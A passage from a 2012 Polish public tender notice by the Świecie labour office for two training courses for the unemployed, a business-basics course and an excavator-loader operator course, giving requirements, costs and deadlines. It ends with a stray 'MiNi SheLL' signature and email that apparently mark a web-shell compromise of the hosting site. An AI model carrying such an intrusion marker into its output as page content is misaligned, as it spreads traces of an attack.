c)	moduł rozliczenia z Zakładem Ubezpieczeń Społecznych osoba(-y) z wykształceniem wyższym oraz doświadczeniem zawodowym w rozliczeniach działalności gospodarczej z ZUS minimum 2 letnim w latach 2009 - 2011,
d)	moduł prawo pracy oraz zasady  i dokumenty dotyczące rejestracji działalności gospodarczej radca prawny z doświadczeniem  zawodowym minimum rocznym. 
dla części II przetargu: 
Każda z osób kadry dydaktycznej będzie posiadać doświadczenie w prowadzeniu co najmniej 1 szkolenia grupowego dziesięcioosobowego o tej samej  tematyce co przedmiot zamówienia w latach 2010-2011,
(Załącznik nr 1 do SIWZ punkt III).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków udziału w postępowaniu zostanie dokonana wg formuły spełnia/nie spełnia na podstawie przedłożonych oświadczeń, dokumentów i informacji wyszczególnionych w niniejszej SIWZ. Z treści złożonych dokumentów musi wynikać jednoznacznie, iż postawione warunki Wykonawca spełnia.  Zamawiający uzna spełnienie przez Wykonawcę warunku znajdowania się w odpowiedniej sytuacji ekonomicznej i finansowej, jeżeli ten oświadczy, że znajduje się w odpowiedniej sytuacji ekonomicznej i finansowej.  
(Załącznik nr 3 do SIWZ).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oświadczenia zawierającego: informacje dotyczące reprezentacji Wykonawcy (w przypadku Wykonawców posiadających wpis do ewidencji działalności gospodarczej), (w przypadku spółek cywilnych każdy ze wspólników musi złożyć osobne oświadczenie), na temat wpisu do RIS oraz akceptacji warunków określonych w SIWZ (Załącznik nr 2 do SIWZ) (oryginał).
Pełnomocnictwa - w przypadku podpisywania oferty lub innych dokumentów załączonych do oferty przez pełnomocnika, to Wykonawca ma obowiązek dołączyć do oferty oryginał lub kserokopię potwierdzoną za zgodność z oryginałem przez osoby do tego upoważnione stosownego pełnomocnictwa.
W przypadku wykonawców ubiegających się wspólnie o udzielenie zamówienia dokument ustanawiający pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Umowa w sprawie zamówienia publicznego będzie zawarta z Wykonawcą, którego oferta zostanie wybrana w terminie nie krótszym niż 5 dni od dnia przesłania zawiadomienia o wyborze najkorzystniejszej oferty, jeżeli zawiadomienie to zostanie przesłane w sposób określony w art. 27 ust. 2 ustawy P.z.p.1, albo w terminie 10 dni - jeżeli zostanie przesłane droga pocztową.
Umowa zostanie zawarta z uwzględnieniem postanowień wynikających z treści niniejszej specyfikacji oraz danych zawartych w ofercie.
              Zamawiający dopuszcza możliwość dokonania zmian w treści zawartej umowy. 
1.	Zamawiający dopuszcza możliwość dokonania zmian w treści umowy.
2.	Umowa może ulec zmianie w wyniku zmiany ilości osób pierwotnie skierowanych na szkolenie. W takiej sytuacji Zamawiający zastrzega sobie prawo do skierowania kolejnego uczestnika z listy rezerwowej w miejsce osoby, która przerwała szkolenie w przypadku gdy pozostała ilość godzin szkolenia umożliwi ukończenie go i zdobycie uprawnień. Zmniejszenie liczby uczestników może nastąpić w szczególności:
a.	niepodjęcia szkolenia przez uczestnika szkolenia
b.	nieusprawiedliwionych nieobecności uczestników na szkoleniu.
3.	Umowa może ulec zmianie w wyniku następujących okoliczności ze strony Wykonawcy: 
a.	Zmiana kadry realizującej szkolenie w wyniku zdarzeń:  długotrwałej choroby wykładowcy, śmierci wykładowcy, rozwiązania umowy o pracę lub umowy cywilnoprawnej ze strony wykładowcy, rozwiązania umowy o pracę przez Wykonawcę w trybie art. 52 KP, których nie można było przewidzieć w dniu zawarcia umowy. W takiej sytuacji Wykonawca jest zobowiązany do przedstawienia do akceptacji harmonogramu uwzględniającego wszystkie zmiany w terminie 7 dni od ich zaistnienia.
b.	W przypadku zmiany statusu prawnego Wykonawcy, siedziby Wykonawcy, miejsc prowadzenia szkolenia, zmiany nazwy Wykonawcy, zmiany osób uprawnionych do reprezentacji, zmianie członków zarządu itp.
4.	Zmiany do umowy zostaną wprowadzane przez zawarcie aneksu pisemnego pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.pup.swiecie.lo.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowty Urząd Pracy w Świeciu, ul Wojska Polskiego 195 a, 86-100 Świecie.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.05.2012 godzina 10:00, miejsce: Powiatowty Urząd Pracy w Świeciu, ul Wojska Polskiego 195 a, 86-100 Świecie pokój nr 11.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> ABC Biznesu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie szkolenia dla 10 osób bezrobotnych.
1.	Program szkolenia
Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie szkolenia dla 10 osób bezrobotnych 
w dwóch grupach pięcioosobowych. Szkolenie każdej z grup ma być przeprowadzone tylko dla uczestników szkolenia skierowanych przez Zamawiającego.
a.	Nazwa szkolenia: ABC biznesu.
b.	Zakres szkolenia
Program szkolenia dla każdej z grup musi obejmować następujące zagadnienia:
a)	opracowanie biznes planu (12 godzin edukacyjnych - 2 godziny teorii, 10 godzin praktyki),
b)	rodzaje sposobów rozliczania z Urzędem Skarbowym, dokumenty wynikające ze sposobów rozliczania (12 godzin edukacyjnych - 4 godziny teorii, 8 godzin praktyki),
c)	rozliczenia z Zakładem Ubezpieczeń Społecznych, dokumenty rozliczeń (7 godzin edukacyjnych - 2 godziny teorii, 5 godzin praktyki),
d)	prawo pracy  (5 godzin edukacyjnych - 5 godzin teorii),
e)	zasady i dokumenty dotyczące rejestracji działalności gospodarczej (3 godziny edukacyjne - 2 godziny teorii, 1 godzina praktyki),
f)	egzamin wewnętrzny (1 godzina edukacyjna -1 godzina praktyki).
c.	Czas trwania i sposób organizacji szkolenia
Liczba godzin szkolenia: 40 godzin zajęć edukacyjnych dla każdej z grup.
W założeniach programowych przyjęto dla zajęć teoretycznych i praktycznych godzinę edukacyjną wynoszącą 45 minut.

Szkolenie musi być prowadzone zgodnie z przedłożonym przez Wykonawcę Planem nauczania     zawierającym: tematy zajęć edukacyjnych oraz treści szkolenia w zakresie poszczególnych zajęć edukacyjnych. (Załącznik nr 1 do SIWZ punkt II podpunkt 5).
Szkolenie ma być realizowane od poniedziałku do piątku w kolejno następujących po sobie dniach roboczych (bez sobót, niedziel i świąt), w przedziale czasowym między godziną 8.00 a 16.00. Liczba godzin szkolenia w ciągu jednego dnia nie może przekraczać 8 godzin edukacyjnych. 
Wskazane jest aby szkolenie obejmowało nie mniej niż 25 godzin zegarowych w tygodniu, celem intensyfikacji i przeciwdziałaniu nieuzasadnionemu wydłużaniu szkolenia. 
Zamawiający zastrzega sobie prawo do skierowania kolejnego uczestnika z listy rezerwowej 
w miejsce osoby, która przerwała szkolenie w przypadku gdy pozostała ilość godzin szkolenia umożliwi ukończenie go i zdobycie zaświadczenia.
d.	Wyposażenie dydaktyczne (wykaz środków i materiałów dydaktycznych), które będą wykorzystane do przeprowadzenia szkolenia
Każdy uczestnik szkolenia, musi otrzymać na własność materiały szkoleniowe (dydaktyczne
 i piśmiennicze) tj. skrypt obejmujący zagadnienia merytoryczne programu szkolenia i długopis oraz aktualne druki dotyczące rejestracji działalności gospodarczej i rozliczeń z US i ZUS (Załącznik nr 1 do SIWZ punkt II podpunkt 7a). 
Każdy uczestnik w pierwszym dniu szkolenia musi otrzymać powyższe materiały szkoleniowe oraz pisemnie potwierdzić ich odbiór.
Wykonawca będzie dysponować wyposażeniem dydaktycznym, urządzeniami do wizualizacji prezentowanych zagadnień szkolenia minimum rzutnikiem multimedialnym, ekranem i tablicą flipchart (Załącznik nr 1 do SIWZ punkt II podpunkt 7b).
Wykonawca jest zobowiązany dostosować wyposażenie dydaktyczne i pomieszczenia do potrzeb szkolenia z uwzględnieniem bezpiecznych i higienicznych warunków realizacji szkolenia.
e.	Przewidziane sprawdziany i egzaminy
Po zakończonym szkoleniu każdej grupy Wykonawca musi przeprowadzić egzamin wewnętrzny. (Załącznik nr 1 do SIWZ punkt II podpunkt 8).
(Koszt egzaminu wewnętrznego należy ująć w Kosztach szkolenia). 
2.	Kwalifikacje i doświadczenie kadry dydaktycznej dostosowane do zakresu szkolenia
Wykonawca będzie dysponował wykwalifikowaną kadrą dydaktyczną. Każdy z wykładowców będzie posiadać doświadczenie w prowadzeniu co najmniej 1 szkolenia grupowego o tej samej  tematyce co przedmiot zamówienia w latach 2010-2011.
Zajęcia musi(-szą) prowadzić osoba(-y):
a)	moduł opracowanie biznesplanu osoba(-y) z wykształceniem wyższym, mająca(-e) doświadczenie w przygotowaniu minimum 2 biznes planów, które zostały wdrożone,
b)	rozliczenia z Urzędem Skarbowym osoba(-y) z wykształceniem wyższym oraz doświadczeniem zawodowym w rozliczeniach działalności gospodarczej z US minimum 2 letnim w latach 2009 - 2011,
c)	moduł rozliczenia z Zakładem Ubezpieczeń Społecznych osoba(-y) z wykształceniem wyższym oraz doświadczeniem zawodowym w rozliczeniach działalności gospodarczej z ZUS minimum 2 letnim w latach 2009 - 2011,
d)	moduł prawo pracy oraz zasady  i dokumenty dotyczące rejestracji działalności gospodarczej radca prawny z doświadczeniem  zawodowym minimum rocznym. 
(Załącznik nr 1 do SIWZ punkt III).
3.	Posiadanie wiedzy i doświadczenia przez Wykonawcę
Wykonawca będzie posiadać doświadczenie w realizacji minimum jednego szkolenia grupowego minimum 10 osobowego o tej samej tematyce w latach  2009 - 2011 roku (Załącznik nr 1 do SIWZ punkt IV).
4.	Dokumenty potwierdzające ukończenie szkolenia i uzyskanie kwalifikacji (Załącznik nr 1 do SIWZ punkt V).
Koniecznym jest, aby uczestnicy szkolenia otrzymali zaświadczenia zgodne z § 75 ust 3 Rozporządzenia Ministra Pracy i Polityki Społecznej z dnia 14 września 2010 r. w sprawie standardów i warunków prowadzenia usług rynku pracy (Dz.U.10.177.1193 z późn. zm.).
5.	Miejsce szkolenia (Załącznik nr 1 do SIWZ punkt VI).
Preferowane Świecie. 
6.	Koszty szkolenia (Załącznik nr 1 do SIWZ punkt VIII).
a.	Wykonawca zapewni uczestnikom szkolenia zakwaterowanie oraz całodobowe wyżywienie (śniadanie, obiad, kolacja) w przypadku: gdy łączny czas przejazdu z miejsca zamieszkania do miejsca odbywania szkolenia i powrotu wyniesie ponad 3 godziny lub organizacji szkolenia poza miejscowością Świecie przy jednoczesnym braku połączeń środkami komunikacji publicznej w godzinach umożliwiających odbycie szkolenia. Obiady mają składać się z minimum dania głównego podczas którego należy zapewnić również wodę i/lub sok.
O ilości osób, które będą korzystały z zakwaterowania i wyżywienia Zamawiający poinformuje Wykonawcę najpóźniej w dniu podpisania umowy lub na 5 dni przed rozpoczęciem szkolenia.
Podczas przerw kawowych Wykonawca musi podać kawę i/lub herbatę i/lub wodę. W przypadku gdy zajęcia praktyczne i/lub teoretyczne odbywać się będą w innej miejscowości niż zakwaterowanie Wykonawca musi zapewnić uczestnikom szkolenia przejazdy z miejsca zakwaterowania do miejsca odbywania szkolenia i z powrotem busem lub samochodem. 
W przypadku gdy zajęcia praktyczne i teoretyczne odbywać się będą w innych miejscowościach Wykonawca musi również zapewnić przejazdy pomiędzy tymi miejscami. 
(Koszty zakwaterowania i/lub wyżywienia i/lub transportu należy podać w Kosztach szkolenia. Jest to koszt warunkowy). 
b.	Wykonawca jest zobowiązany do ubezpieczenia od następstw nieszczęśliwych wypadków uczestników szkolenia, będących osobami bezrobotnymi od dnia podjęcia przez nich zatrudnienia, innej pracy zarobkowej lub podjęcia działalności gospodarczej w trakcie szkolenia (art. 41 ust. 3b ustawy o promocji zatrudnienia i instytucjach rynku pracy Dz. U.08.69.415 z późn. zm.). 
Wykonawca jest zobowiązany do ubezpieczenia od następstw nieszczęśliwych wypadków uczestników szkolenia, będących poszukującymi pracy, o których mowa w art. 43 ust. 1 ustawy o  promocji zatrudnienia i instytucjach rynku pracy od dnia rozpoczęcia przez nich szkolenia.
Wykonawca jest zobowiązany do ubezpieczenia od następstw nieszczęśliwych wypadków uczestników szkolenia, którym nie przysługuje prawo do stypendium, zgodnie z art. 41 ust. 7 i 8 ustawy o  promocji zatrudnienia i instytucjach rynku pracy od dnia rozpoczęcia przez nich szkolenia.
Zapłata należności za zorganizowanie szkolenia obejmuje koszty ubezpieczenia od następstw nieszczęśliwych wypadków uczestnika(-ów) szkolenia, powstałych w związku z odbywaniem szkolenia oraz w drodze do miejsca szkolenia i z powrotem, tylko w przypadku, gdy wydatek z tego tytułu został poniesiony na wniosek Zamawiającego i udokumentowany przez Wykonawcę. 
Informacja o konieczności ubezpieczenia uczestnika(-ów) szkolenia zostanie przekazana Wykonawcy przez Zamawiającego pisemnie. 
(Koszt ubezpieczenia ujęty w Kosztach szkolenia jest kosztem warunkowym).
7.	W ostatnim dniu szkolenia Wykonawca jest zobowiązany przeprowadzić badanie ankietowe uczestnikom szkolenia służące ocenie szkolenia (wzór ankiety anonimowej stanowi załącznik do umowy szkoleniowej i jest to druk Zamawiającego) (Załącznik nr 4a do SIWZ)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 55.10.00.00-1, 55.30.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 11.06.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Operator koparko-ładowarki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Program szkolenia
Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie szkolenia dla 10 osób bezrobotnych w jednej grupie. Szkolenie ma być przeprowadzone tylko dla uczestników szkolenia skierowanych przez Zamawiającego. 
a.	Nazwa szkolenia: Operator koparko-ładowarki.
b.	Zakres szkolenia
Program i ilość godzin szkolenia musi spełniać wymagania określone w Rozporządzeniu Ministra Gospodarki z dnia 20 września 2001 r. w sprawie bezpieczeństwa i higieny pracy podczas eksploatacji maszyn i innych urządzeń technicznych do robót ziemnych, budowlanych i drogowych (Dz. U. Nr 118, Poz. 1263), ponadto musi być zatwierdzony przez Instytut Mechanizacji Budownictwa i Górnictwa Skalnego w Warszawie.
c.	Czas trwania i sposób organizacji szkolenia
Liczba godzin szkolenia 202 godziny zajęć, w tym:
116	godzin teoretycznych,
86 godzin praktycznych,
W założeniach programowych przyjęto dla zajęć teoretycznych i praktycznych godzinę edukacyjną wynoszącą 45 minut.
Szkolenie musi być prowadzone zgodnie z przedłożonym przez Wykonawcę Planem nauczania      zawierającym: tematy zajęć edukacyjnych oraz opis treści szkolenia w zakresie poszczególnych  zajęć edukacyjnych.
Szkolenie musi być prowadzone zgodnie z przedłożonym przez Wykonawcę Planem nauczania zawierającym: tematy zajęć edukacyjnych oraz treści szkolenia w zakresie poszczególnych  zajęć edukacyjnych. (Załącznik nr 1 do SIWZ punkt II podpunkt 5).
Szkolenie ma być realizowane od poniedziałku do piątku w kolejno następujących po sobie dniach roboczych (bez sobót, niedziel i świąt), w przedziale czasowym między godziną 8.00 a 18.00. Liczba godzin szkolenia w ciągu jednego dnia nie może przekraczać 8 godzin edukacyjnych. 
Wskazane jest aby szkolenie obejmowało nie mniej niż 25 godzin zegarowych w tygodniu, celem intensyfikacji i przeciwdziałaniu nieuzasadnionemu wydłużaniu szkolenia. 
Zamawiający zastrzega sobie prawo do skierowania kolejnego uczestnika z listy rezerwowej w miejsce osoby, która przerwała szkolenie w przypadku gdy pozostała ilość godzin szkolenia umożliwi ukończenie go i zdobycie uprawnień.
d.	Wyposażenie dydaktyczne (wykaz środków i materiałów dydaktycznych), które będą wykorzystane do przeprowadzenia szkolenia
Każdy uczestnik szkolenia, musi otrzymać na własność materiały szkoleniowe (dydaktyczne 
i piśmiennicze) tj. skrypt obejmujący merytoryczne zagadnienia programu szkolenia i długopis (każdy uczestnik w pierwszym dniu szkolenia musi otrzymać powyższe materiały szkoleniowe oraz pisemnie potwierdzić ich odbiór). 
Wykonawca do realizacji zajęć teoretycznych szkolenia będzie dysponował wyposażeniem dydaktycznym, urządzeniami do wizualizacji prezentowanych zagadnień szkolenia minimum rzutnikiem multimedialnym, ekranem i tablicą flipchart (Załącznik nr 1 do SIWZ punkt II podpunkt 7a). 
Wykonawca do realizacji zajęć praktycznych szkolenia będzie dysponował sprzętem: minimum 2 koparko-ładowarkami.
(Załącznik nr 1 do SIWZ punkt II podpunkt 7b).
 Wykonawca jest zobowiązany dostosować wyposażenie dydaktyczne i pomieszczenia do potrzeb szkolenia z uwzględnieniem bezpiecznych i higienicznych warunków realizacji szkolenia.
e.	Przewidziane sprawdziany i egzaminy
Po zakończonym szkoleniu Wykonawca musi dokonać zapłaty za pierwszy egzamin końcowy przed Komisją powołaną przez Instytut Mechanizacji Budownictwa i Górnictwa Skalnego w Warszawie 
i pisemnie poinformować Zamawiającego o wyznaczonym terminie ww. egzaminu. (Załącznik nr 1 do SIWZ punkt II podpunkt 8).
(Koszt egzaminu państwowego należy ująć w Kosztach szkolenia). 
2.	Kwalifikacje i doświadczenie kadry dydaktycznej dostosowane do zakresu szkolenia
Wykonawca będzie dysponował wykwalifikowaną kadrą dydaktyczną wykładowcy(-ów) 
i instruktora(-ów). Każda z osób kadry dydaktycznej będzie posiadać doświadczenie w prowadzeniu co najmniej 1 szkolenia grupowego dziesięcioosobowego o tej samej  tematyce co przedmiot zamówienia w latach 2010-2011 (Załącznik nr 1 do SIWZ punkt III).
3.	Posiadanie wiedzy i doświadczenia przez Wykonawcę
Wykonawca będzie posiadać doświadczenie w realizacji minimum jednego szkolenia grupowego minimum 10 - osobowego o tej samej tematyce w latach  2009 - 2011 roku (Załącznik nr 1 do SIWZ punkt IV).
Wykonawca będzie dysponować na czas realizacji szkolenia pozwoleniami Instytutu Mechanizacji Budownictwa i Górnictwa Skalnego w Warszawie na przeprowadzanie szkoleń w zakresie operatorów maszyn do robót ziemnych, budowlanych i drogowych.
4.	Dokumenty potwierdzające ukończenie szkolenia i uzyskanie kwalifikacji (Załącznik nr 1 do SIWZ punkt V).
a.	Koniecznym jest, aby uczestnicy szkolenia otrzymali zaświadczenia zgodne 
 z § 75 ust 3 Rozporządzenia Ministra Pracy i Polityki Społecznej z dnia 14 września 2010 r. w sprawie standardów i warunków prowadzenia usług rynku pracy (Dz.U.10.177.1193 z późn. zm.).
b.	Każdy uczestnik szkolenia, który zda egzamin końcowy musi otrzymać książkę operatora wydaną przez Instytut Mechanizacji Budownictwa i Górnictwa Skalanego oraz świadectwo zgodnie 
z Rozporządzeniem Ministra Gospodarki z dnia 20 września 2001 r. w sprawie bezpieczeństwa 
i higieny pracy podczas eksploatacji maszyn i innych urządzeń technicznych do robót ziemnych, budowlanych i drogowych (Dz. U. Nr 118, Poz. 1263). Dla osób, które posiadają już książkę operatora należy dokonać w niej wpisu nadającego odpowiednie  uprawnienia.
c.	Wykonawca jest zobowiązany po zakończeniu egzaminu państwowego i otrzymaniu uprawnień dostarczyć Zamawiającemu oryginał książki operatora oraz pisemną informację o uczestnikach, którzy nie stawili się na egzaminie lub go nie zdali. 
5.	Miejsce szkolenia (Załącznik nr 1 do SIWZ punkt VI).
Preferowane Świecie. 
6.	Koszty szkolenia (Załącznik nr 1 do SIWZ punkt VIII).
a.	Wykonawca zapewni uczestnikom szkolenia zakwaterowanie oraz całodobowe wyżywienie (śniadanie, obiad, kolacja) w przypadku: gdy łączny czas przejazdu z miejsca zamieszkania do miejsca odbywania szkolenia i powrotu wyniesie ponad 3 godziny lub organizacji szkolenia poza miejscowością Świecie przy jednoczesnym braku połączeń środkami komunikacji publicznej 
w godzinach umożliwiających odbycie szkolenia. Obiady mają składać się z minimum dania głównego podczas którego należy zapewnić również wodę i/lub sok.
O ilości osób, które będą korzystały z zakwaterowania i wyżywienia Zamawiający poinformuje Wykonawcę najpóźniej w dniu podpisania umowy lub na 5 dni przed rozpoczęciem szkolenia.
Podczas przerw kawowych Wykonawca musi podać kawę i/lub herbatę i/lub wodę. 
W przypadku gdy zajęcia praktyczne i/lub teoretyczne odbywać się będą w innej miejscowości niż zakwaterowanie Wykonawca musi zapewnić uczestnikom szkolenia przejazdy z miejsca zakwaterowania do miejsca odbywania szkolenia i z powrotem busem lub samochodem. 
W przypadku gdy zajęcia praktyczne i teoretyczne odbywać się będą w innych miejscowościach Wykonawca musi również zapewnić przejazdy pomiędzy tymi miejscami. 
(Koszty zakwaterowania i/lub wyżywienia i/lub transportu należy podać w Kosztach szkolenia. Jest to koszt warunkowy). 
b.	Wykonawca jest zobowiązany do ubezpieczenia od następstw nieszczęśliwych wypadków uczestników szkolenia, będących osobami bezrobotnymi od dnia podjęcia przez nich zatrudnienia, innej pracy zarobkowej lub podjęcia działalności gospodarczej w trakcie szkolenia (art. 41 ust. 3b ustawy o promocji zatrudnienia i instytucjach rynku pracy Dz. U.08.69.415 z późn. zm.). 
Wykonawca jest zobowiązany do ubezpieczenia od następstw nieszczęśliwych wypadków uczestników szkolenia, będących poszukującymi pracy, o których mowa w art. 43 ust. 1 ustawy o  promocji zatrudnienia i instytucjach rynku pracy od dnia rozpoczęcia przez nich szkolenia.
Wykonawca jest zobowiązany do ubezpieczenia od następstw nieszczęśliwych wypadków uczestników szkolenia, którym nie przysługuje prawo do stypendium, zgodnie z art. 41 ust. 7 i 8 ustawy o  promocji zatrudnienia i instytucjach rynku pracy od dnia rozpoczęcia przez nich szkolenia.
Zapłata należności za zorganizowanie szkolenia obejmuje koszty ubezpieczenia od następstw nieszczęśliwych wypadków uczestnika(-ów) szkolenia, powstałych w związku z odbywaniem szkolenia oraz w drodze do miejsca szkolenia i z powrotem, tylko w przypadku, gdy wydatek z tego tytułu został poniesiony na wniosek Zamawiającego i udokumentowany przez Wykonawcę. 
Informacja o konieczności ubezpieczenia uczestnika(-ów) szkolenia zostanie przekazana Wykonawcy przez Zamawiającego pisemnie. 
(Koszt ubezpieczenia ujęty w Kosztach szkolenia jest kosztem warunkowym).
c.	Koszty badań lekarskich uczestników szkolenia pokrywa Zamawiający.
d.	W ostatnim dniu szkolenia Wykonawca jest zobowiązany przeprowadzić badanie ankietowe uczestnikom szkolenia służące ocenie szkolenia (wzór ankiety anonimowej stanowi załącznik do umowy szkoleniowej i jest to druk Zamawiającego) (Załącznik nr 4a do SIWZ)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 55.10.00.00-1, 55.30.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 05.06.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com